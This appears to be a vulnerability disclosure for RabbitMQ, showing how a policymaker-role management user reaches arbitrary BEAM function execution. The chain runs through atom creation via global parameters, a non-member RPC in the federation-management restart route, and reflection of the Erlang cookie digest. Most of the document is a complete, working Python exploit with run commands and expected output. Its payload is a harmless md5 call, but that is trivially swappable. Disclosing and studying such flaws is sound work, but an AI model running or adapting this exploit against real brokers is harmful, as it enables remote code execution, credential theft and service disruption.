Описание
RabbitMQ policymaker RCE through federation-management nonmember RPC and distribution reflection
Summary
A RabbitMQ management user with the policymaker tag can escalate from vhost policy management to arbitrary BEAM function execution without administrator credentials, Erlang cookie knowledge, or local operating-system access
The chain combines:
- Policymaker-accessible global-parameter names are converted into new Erlang atoms, allowing the attacker to intern
evil@attacker and oracle@attacker
- The federation-management restart resource accepts an existing node atom and calls
rpc:call/5 from resource_exists/2 without validating cluster membership
- Two concurrent requests initiate two outbound distribution handshakes to attacker nodes
- OTP 27's legacy cookie digest can be reflected between those connections because it is not bound to peer identity, connection direction, or the complete transcript
- The authenticated connection can address
rex with attacker-controlled module, function, arguments, external PID, and correlation tag
The proof invokes only erlang:md5(Nonce) and verifies the exact returned digest. A request changing only the function to nonexistent erlang:md6/1 returns a correlated undef response without the positive digest
This is an authenticated policymaker RCE, not an administrator-only, unauthenticated, or pre-authentication issue
Preconditions
- Valid management credentials with the
policymaker tag
- Permission for the selected vhost
rabbitmq_federation and rabbitmq_federation_management enabled
- Global-parameter and federation-link management routes reachable
- Broker DNS resolves the attacker-controlled hostname used in the node names
- Broker egress reaches attacker-controlled TCP 4369 EPMD
- Broker egress reaches two attacker-controlled distribution ports returned by EPMD
- Plain OTP 27 distribution using the tested handshake behavior
- Both target-originated handshakes use the same RabbitMQ cookie
The attacker does not need:
- Administrator credentials
- The Erlang cookie value
- Local shell or filesystem access
- Existing cluster membership
- Plugin or code-path write access
- Access to the RabbitMQ data directory
Root cause
1. Global-parameter names create node atoms
The management global-parameter route passes its raw path name to rabbit_runtime_parameters:set_global/3, which executes:
set_global(Name, Term, ActingUser) ->
NameAsAtom = rabbit_data_coercion:to_atom(Name),
...
The proof sends:
PUT /api/global-parameters/evil@attacker
PUT /api/global-parameters/oracle@attacker
The policymaker tag is authorized for global parameters, so both attacker node identities become existing atoms
2. Federation resource lookup performs nonmember RPC
The vulnerable extension route is:
DELETE /api/federation-links/vhost/:vhost/:id/:node/restart
For DELETE, rabbit_federation_mgmt:is_authorized/2 calls:
rabbit_mgmt_util:is_authorized_policies(ReqData, Context)
A policymaker with access to the vhost is accepted
Cowboy calls resource_exists/2 before delete_resource/2. For any nonempty route ID, resource_exists/2 invokes lookup/2:
lookup(Id, ReqData) ->
try get_node(ReqData) of
Node ->
case rpc:call(
Node,
rabbit_federation_status,
lookup,
[Id],
infinity) of
...
end
catch
error:badarg -> false
end.
The node guard is only:
get_node(ReqData) ->
binary_to_existing_atom(
rabbit_mgmt_util:id(node, ReqData), utf8).
There is no rabbit_nodes:is_member(Node) check before the RPC
The HTTP responses can be 404 because the attacker node does not implement rabbit_federation_status:lookup/1. The outbound EPMD lookup and distribution handshake already occurred before the response
3. Cookie challenge responses are reflectable
For the legacy challenge response:
H(K, N) = MD5(K || decimal(N))
where K is the RabbitMQ node's cookie and N is a challenge:
- Fake node
evil supplies challenge Ns
- RabbitMQ returns challenge
Nt and H(K, Ns)
- The attacker holds the
evil connection
- Fake node
oracle supplies Nt as its challenge
- RabbitMQ returns
H(K, Nt) on the oracle connection
- The attacker submits that digest as the held connection's challenge acknowledgement
- RabbitMQ authenticates the held connection without the attacker learning
K
Two peer names prevent normal simultaneous-connection arbitration from collapsing the handshakes
4. The authenticated peer invokes rex
The attacker sends a registered distribution message to rex containing:
{'$gen_call', {AttackerPid, Tag},
{call, Module, Function, Arguments, AttackerPid}}
The attacker controls Module, Function, Arguments, the external PID, and the correlation tag
Relationship to #17106
Upstream commit 84fc5f46119a1fbe876fcd7919dc036663f45671 merged #17106 with the subject:
HTTP API: validate the target node is a cluster member
That patch adds membership validation to rabbit_mgmt_wm_reset:resource_exists/2 and closes the original administrator reset-route entry
The patch does not centralize node validation and does not change:
rabbit_federation_mgmt:lookup/2
rabbit_federation_mgmt:restart/2
rabbit_federation_mgmt:get_node/1
The isolated proof reproduced arbitrary BEAM MFA on the exact #17106 merge commit through the federation-management extension with the lower policymaker role
Source evidence
Relevant source:
deps/rabbitmq_management/src/rabbit_mgmt_wm_global_parameter.erl:48-76
deps/rabbit/src/rabbit_runtime_parameters.erl:95-112
deps/rabbitmq_federation_management/src/rabbit_federation_mgmt.erl:41-51
deps/rabbitmq_federation_management/src/rabbit_federation_mgmt.erl:61-70
deps/rabbitmq_federation_management/src/rabbit_federation_mgmt.erl:133-157
Basic Python proof of concept
Attachment: rabbitmq-policymaker-federation-distribution-reflection-rce-poc.py
The attachment is a dedicated single-file Python 3 standard-library PoC for the policymaker federation-management route
Target requirements
- A policymaker account with vhost permission
- Federation and federation-management plugins enabled
- Plain HTTP management API reachable on port 15672 or another configured port
- The hostname
attacker resolves from the broker to the PoC machine
- TCP 4369, 19101, and 19102 on the PoC machine are reachable from the broker
- Binding TCP 4369 usually requires root,
CAP_NET_BIND_SERVICE, or an isolated container
Run
sudo python3 rabbitmq-policymaker-federation-distribution-reflection-rce-poc.py \
--management-host rabbitmq.example \
--management-port 15672 \
--user policy \
--password policy-password \
--vhost / \
--federation-id probe \
--attacker-hostname attacker
The PoC never calls os:cmd, reads a file, loads code, or spawns a shell
Expected output includes:
{
"entry": "federation",
"global_parameter_statuses": [201, 201],
"trigger_statuses": [404, 404],
"federation_restart_statuses": [404, 404],
"epmd_queries": ["evil", "oracle"],
"authenticated_without_cookie": true,
"reflection_digest_matches_oracle": true,
"negative_control": {
"function": "md6",
"positive_digest_returned": false,
"correlated_reply": true,
"undef_returned": true
},
"positive_control": {
"function": "md5",
"digest": "45b3d29a7c795310de18a3903393bcc1",
"correlated_reply": true
},
"errors": []
}
VULNERABLE
The 404 responses are expected. The vulnerable outbound connections occur during federation resource lookup before those responses
End-to-end verification
An isolated Docker verifier cloned, built, and ran exact upstream commit:
84fc5f46119a1fbe876fcd7919dc036663f45671
Erlang/OTP 27 [erts-15.2.7.10]
Observed:
POLICYMAKER_FEDERATION_REFLECTION_TRIGGER_OK
POLICYMAKER_FEDERATION_REFLECTION_RCE_OK
LATEST_MAIN_POLICYMAKER_FEDERATION_RCE_VERIFIED 84fc5f46119a1fbe876fcd7919dc036663f45671
Ping succeeded
Latest-main result:
{
"verified_commit": "84fc5f46119a1fbe876fcd7919dc036663f45671",
"rabbitmq_version": "84fc5f4",
"otp_release": "27",
"role_id": "policymaker",
"execution_sink": "arbitrary_beam_mfa",
"source_sha256": "43b0b69f835831ecf4bd0b9331342c81f9eb858ac4ebddc0930c0a02ddf5684a",
"broker_final_ping": true
}
The source checkout remained unmodified and the broker remained healthy
Impact
The demonstrated primitive is arbitrary BEAM MFA execution in the RabbitMQ VM. Depending on loaded modules, this can:
- Read or modify files accessible to the RabbitMQ operating-system account
- Access broker credentials and in-memory state
- Open network connections with the broker's privileges
- Invoke operating-system command facilities exposed by loaded Erlang modules
- Stop or corrupt the RabbitMQ node
#!/usr/bin/env python3
"""Safe standalone RabbitMQ policymaker-to-BEAM-MFA PoC.
This script exercises only the federation-management entry route and invokes
only erlang:md5/1 over a fixed nonce. It uses Python's standard library only.
Run it only against an isolated test broker.
"""
from __future__ import annotations
import argparse
import base64
import concurrent.futures
import hashlib
import json
import socket
import struct
import threading
import time
import urllib.parse
NONCE = b"RABBITMQ_REFLECTION_RPC_NONCE"
EXPECTED_DIGEST = hashlib.md5(NONCE).digest()
LOCK = threading.Lock()
EVENTS: dict[str, list[dict]] = {}
REFLECTION = {"target_challenge": None, "reflected_digest": None}
def record(key: str, value: dict) -> None:
with LOCK:
EVENTS.setdefault(key, []).append(value)
def wait_event(key: str, timeout: float = 30) -> dict:
deadline = time.time() + timeout
while time.time() < deadline:
with LOCK:
values = EVENTS.get(key, [])
if values:
return values[-1]
time.sleep(0.05)
raise TimeoutError(f"event not observed: {key}")
def recv_exact(sock: socket.socket, size: int) -> bytes:
data = bytearray()
while len(data) < size:
chunk = sock.recv(size - len(data))
if not chunk:
raise EOFError("socket closed")
data.extend(chunk)
return bytes(data)
def recv_packet(sock: socket.socket, width: int) -> bytes:
size = int.from_bytes(recv_exact(sock, width), "big")
return recv_exact(sock, size)
def send_packet(sock: socket.socket, payload: bytes, width: int) -> None:
sock.sendall(len(payload).to_bytes(width, "big") + payload)
def atom(value: str) -> bytes:
encoded = value.encode()
if len(encoded) < 256:
return b"w" + bytes([len(encoded)]) + encoded
return b"v" + len(encoded).to_bytes(2, "big") + encoded
def small_integer(value: int) -> bytes:
return b"a" + bytes([value])
def tuple_ext(*items: bytes) -> bytes:
return b"h" + bytes([len(items)]) + b"".join(items)
def binary_ext(value: bytes) -> bytes:
return b"m" + len(value).to_bytes(4, "big") + value
def list_ext(items: list[bytes]) -> bytes:
return b"l" + len(items).to_bytes(4, "big") + b"".join(items) + b"j"
def new_pid(node_name: str) -> bytes:
return b"X" + atom(node_name) + struct.pack(">III", 1, 0, 1)
def rex_packet(node_name: str, function_name: str) -> bytes:
sender = new_pid(node_name)
control = tuple_ext(small_integer(6), sender, atom(""), atom("rex"))
call = tuple_ext(
atom("call"),
atom("erlang"),
atom(function_name),
list_ext([binary_ext(NONCE)]),
sender,
)
from_tuple = tuple_ext(sender, atom(function_name + "_probe"))
message = tuple_ext(atom("$gen_call"), from_tuple, call)
return b"p\x83" + control + b"\x83" + message
def parse_name(payload: bytes) -> tuple[int, str]:
if payload[:1] == b"N":
flags = int.from_bytes(payload[1:9], "big")
name_len = int.from_bytes(payload[13:15], "big")
return flags, payload[15 : 15 + name_len].decode(errors="replace")
if payload[:1] == b"n":
flags = int.from_bytes(payload[1:5], "big")
return flags, payload[7:].decode(errors="replace")
raise ValueError(f"unexpected NAME packet: {payload[:1]!r}")
def challenge_packet(flags: int, challenge: int, name: str) -> bytes:
encoded = name.encode()
return (
b"N"
+ flags.to_bytes(8, "big")
+ challenge.to_bytes(4, "big")
+ (1).to_bytes(4, "big")
+ len(encoded).to_bytes(2, "big")
+ encoded
)
def distribution_listener(
port: int, fake_name: str, role: str, ready: threading.Event
) -> None:
listener = socket.socket()
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", port))
listener.listen(8)
ready.set()
while True:
conn, peer = listener.accept()
threading.Thread(
target=handle_distribution,
args=(conn, peer, fake_name, role),
daemon=True,
).start()
def handle_distribution(
conn: socket.socket, peer: tuple[str, int], fake_name: str, role: str
) -> None:
try:
target_flags, target_name = parse_name(recv_packet(conn, 2))
# Disable optional atom-cache and fragmentation headers so the PoC can
# use legacy pass-through framing while preserving mandatory flags.
negotiated = target_flags & ~0x2000 & ~0x800000
send_packet(conn, b"sok", 2)
if role == "held":
challenge = 0x13572468
else:
deadline = time.time() + 15
while REFLECTION["target_challenge"] is None and time.time() < deadline:
time.sleep(0.01)
challenge = REFLECTION["target_challenge"]
if challenge is None:
raise TimeoutError("held connection challenge was not captured")
send_packet(
conn,
challenge_packet(negotiated, int(challenge), fake_name),
2,
)
reply = recv_packet(conn, 2)
if reply[:1] != b"r" or len(reply) != 21:
raise ValueError(f"unexpected challenge reply: {reply!r}")
target_challenge = int.from_bytes(reply[1:5], "big")
digest = reply[5:21]
record(
"distribution_handshake",
{
"role": role,
"peer": list(peer),
"target": target_name,
"server_challenge": challenge,
"target_challenge": target_challenge,
"digest": digest.hex(),
},
)
if role == "oracle":
REFLECTION["reflected_digest"] = digest
record("oracle", {"digest": digest.hex()})
time.sleep(2)
return
REFLECTION["target_challenge"] = target_challenge
deadline = time.time() + 15
while REFLECTION["reflected_digest"] is None and time.time() < deadline:
time.sleep(0.01)
reflected = REFLECTION["reflected_digest"]
if reflected is None:
raise TimeoutError("oracle digest was not captured")
send_packet(conn, b"a" + bytes(reflected), 2)
record("reflection", {"authenticated": True, "digest": bytes(reflected).hex()})
# One-field negative control: nonexistent erlang:md6/1 must return a
# correlated undef response and never the positive digest.
time.sleep(0.2)
send_packet(conn, rex_packet(fake_name, "md6"), 4)
negative_packets: list[bytes] = []
negative_deadline = time.time() + 1.5
while time.time() < negative_deadline:
conn.settimeout(max(0.1, negative_deadline - time.time()))
try:
payload = recv_packet(conn, 4)
except socket.timeout:
break
if EXPECTED_DIGEST in payload:
raise AssertionError("negative control returned positive digest")
negative_packets.append(payload)
negative_reply = next(
(packet for packet in negative_packets if b"md6_probe" in packet),
None,
)
record(
"negative",
{
"function": "md6",
"positive_digest_returned": False,
"correlated_reply": negative_reply is not None,
"undef_returned": (
negative_reply is not None
and b"badrpc" in negative_reply
and b"undef" in negative_reply
),
},
)
# Harmless positive arbitrary-MFA proof.
send_packet(conn, rex_packet(fake_name, "md5"), 4)
deadline = time.time() + 12
while time.time() < deadline:
conn.settimeout(max(0.1, deadline - time.time()))
try:
payload = recv_packet(conn, 4)
except socket.timeout:
break
if EXPECTED_DIGEST in payload and b"md5_probe" in payload:
record(
"positive",
{
"function": "md5",
"nonce": NONCE.hex(),
"digest": EXPECTED_DIGEST.hex(),
"correlated_reply": True,
},
)
return
record("positive", {"correlated_reply": False})
except Exception as exc:
record("error", {"role": role, "error": repr(exc)})
finally:
try:
conn.close()
except OSError:
pass
def epmd_server(
held_port: int,
oracle_port: int,
attacker_hostname: str,
ready: threading.Event,
) -> None:
ports = {b"evil": held_port, b"oracle": oracle_port}
listener = socket.socket()
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(("0.0.0.0", 4369))
listener.listen(32)
ready.set()
while True:
conn, peer = listener.accept()
threading.Thread(
target=handle_epmd,
args=(conn, peer, ports, attacker_hostname),
daemon=True,
).start()
def handle_epmd(
conn: socket.socket,
peer: tuple[str, int],
ports: dict[bytes, int],
attacker_hostname: str,
) -> None:
try:
request = recv_exact(conn, int.from_bytes(recv_exact(conn, 2), "big"))
if request[:1] != b"z":
raise ValueError(f"unexpected EPMD request: {request.hex()}")
name = request[1:]
port = ports.get(name)
record("epmd", {"name": name.decode(errors="replace"), "peer": list(peer)})
if port is None:
conn.sendall(b"w\x01")
return
full_name = name + b"@" + attacker_hostname.encode()
response = (
b"w\x00"
+ port.to_bytes(2, "big")
+ b"M\x00"
+ (6).to_bytes(2, "big")
+ (5).to_bytes(2, "big")
+ len(full_name).to_bytes(2, "big")
+ full_name
+ b"\x00\x00"
)
conn.sendall(response)
except Exception as exc:
record("error", {"service": "epmd", "error": repr(exc)})
finally:
conn.close()
def http_request(
host: str,
port: int,
method: str,
path: str,
credentials: str,
timeout: float = 30,
) -> int:
token = base64.b64encode(credentials.encode()).decode()
body = b'{"value":0}' if method == "PUT" else b""
headers = [
f"Host: {host}",
f"Authorization: Basic {token}",
"Connection: close",
]
if body:
headers += [
"Content-Type: application/json",
f"Content-Length: {len(body)}",
]
request = (
f"{method} {path} HTTP/1.1\r\n"
+ "\r\n".join(headers)
+ "\r\n\r\n"
).encode() + body
with socket.create_connection((host, port), timeout=timeout) as sock:
sock.settimeout(timeout)
sock.sendall(request)
response = bytearray()
while True:
try:
chunk = sock.recv(65_536)
except socket.timeout:
break
if not chunk:
break
response.extend(chunk)
if not response.startswith(b"HTTP/"):
return 0
return int(response.split(b" ", 2)[1])
def main() -> int:
parser = argparse.ArgumentParser(
description="Safe policymaker federation-management distribution reflection PoC"
)
parser.add_argument("--management-host", required=True)
parser.add_argument("--management-port", type=int, default=15672)
parser.add_argument("--management-prefix", default="")
parser.add_argument("--user", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vhost", default="/")
parser.add_argument("--federation-id", default="probe")
parser.add_argument("--attacker-hostname", default="attacker")
parser.add_argument("--held-port", type=int, default=19101)
parser.add_argument("--oracle-port", type=int, default=19102)
args = parser.parse_args()
held_name = f"evil@{args.attacker_hostname}"
oracle_name = f"oracle@{args.attacker_hostname}"
ready = [threading.Event(), threading.Event(), threading.Event()]
threads = [
threading.Thread(
target=epmd_server,
args=(
args.held_port,
args.oracle_port,
args.attacker_hostname,
ready[0],
),
daemon=True,
),
threading.Thread(
target=distribution_listener,
args=(args.held_port, held_name, "held", ready[1]),
daemon=True,
),
threading.Thread(
target=distribution_listener,
args=(args.oracle_port, oracle_name, "oracle", ready[2]),
daemon=True,
),
]
for thread in threads:
thread.start()
if not all(event.wait(5) for event in ready):
raise RuntimeError("attacker listeners failed to start")
credentials = f"{args.user}:{args.password}"
prefix = "/" + args.management_prefix.strip("/") if args.management_prefix else ""
api = prefix + "/api"
atom_statuses = []
for node in (held_name, oracle_name):
atom_statuses.append(
http_request(
args.management_host,
args.management_port,
"PUT",
api + "/global-parameters/" + urllib.parse.quote(node, safe="@-"),
credentials,
)
)
if not all(status in (201, 204) for status in atom_statuses):
raise RuntimeError(f"failed to create node atoms: {atom_statuses}")
encoded_vhost = urllib.parse.quote(args.vhost, safe="")
encoded_id = urllib.parse.quote(args.federation_id, safe="")
def restart(node: str) -> int:
path = (
api
+ "/federation-links/vhost/"
+ encoded_vhost
+ "/"
+ encoded_id
+ "/"
+ urllib.parse.quote(node, safe="@-")
+ "/restart"
)
return http_request(
args.management_host,
args.management_port,
"DELETE",
path,
credentials,
)
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
restart_statuses = list(executor.map(restart, (held_name, oracle_name)))
reflection = wait_event("reflection")
oracle = wait_event("oracle")
negative = wait_event("negative")
positive = wait_event("positive")
result = {
"entry": "federation",
"global_parameter_statuses": atom_statuses,
"federation_restart_statuses": restart_statuses,
"epmd_queries": [item["name"] for item in EVENTS.get("epmd", [])],
"authenticated_without_cookie": reflection["authenticated"],
"reflection_digest_matches_oracle": reflection["digest"] == oracle["digest"],
"negative_control": negative,
"positive_control": positive,
"errors": EVENTS.get("error", []),
}
print(json.dumps(result, indent=2))
vulnerable = (
restart_statuses == [404, 404]
and set(result["epmd_queries"]) >= {"evil", "oracle"}
and reflection["authenticated"] is True
and result["reflection_digest_matches_oracle"] is True
and negative["function"] == "md6"
and negative["positive_digest_returned"] is False
and negative["correlated_reply"] is True
and negative["undef_returned"] is True
and positive["function"] == "md5"
and positive["digest"] == EXPECTED_DIGEST.hex()
and positive["correlated_reply"] is True
and not result["errors"]
)
print("VULNERABLE" if vulnerable else "NOT_REPRODUCED")
return 0 if vulnerable else 1
if __name__ == "__main__":
raise SystemExit(main())